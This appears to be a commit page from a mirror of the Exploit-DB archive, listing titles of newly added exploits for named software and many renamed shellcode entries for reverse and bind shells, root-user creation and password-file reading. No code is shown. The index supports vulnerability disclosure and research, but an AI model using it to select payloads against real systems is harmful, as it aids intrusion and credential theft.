bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-16

Browse source 
39 changes to exploits/shellcodes

OBS studio 20.1.3 - Local Buffer Overflow

Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation
Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation
SysGauge Server 3.6.18 - Buffer Overflow
Disk Pulse Enterprise 10.1.18 - Buffer Overflow
Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution
ImgHosting 1.5 - Cross-Site Scripting
Domains & Hostings Manager PRO 3.0 - Authentication Bypass
PerfexCRM 1.9.7 - Arbitrary File Upload
RISE 1.9 - 'search' SQL Injection
Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
Adminer 4.3.1 - Server-Side Request Forgery
Oracle PeopleSoft 8.5x - Remote Code Execution
ILIAS < 5.2.4 - Cross-Site Scripting
Flash Operator Panel 2.31.03 - Command Execution

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection

BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)
BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)

BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)
BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)
BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)
BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)

BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)
BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)

BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)
BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)

FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)
FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)

FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)

FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)
FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)

FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)

Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)
Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)

Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode
Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode
Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)
Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)

Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)
Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)
Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)
Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)
Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)
Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)

Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)

Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)
Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)
Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)

Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)
Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)

Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)
Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)

Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)

Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)
Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)

Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)

OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)
OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)

Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)
Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)

Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)
Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)
Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode

Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)

Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)
FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)

Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode

Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)
Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)

Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)
Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)
Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)
Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)

BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)
BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)
Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode
Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode
Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)
FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)
FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)

Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)
Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)

Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)

Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)

Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)
Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)

Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode
Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)
Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)

Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)
Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)

Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)

Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)
Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)

OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)
OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)

Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)
Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)

Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)

Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)
Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)
Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)

Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)
Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)
Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)

Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)

Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)
Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
OpenBSD/x86 - reboot() Shellcode (15 bytes)

Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)

Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)
Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)
Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)

Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)

FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)

FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)
FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)

IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)
IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)

Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)

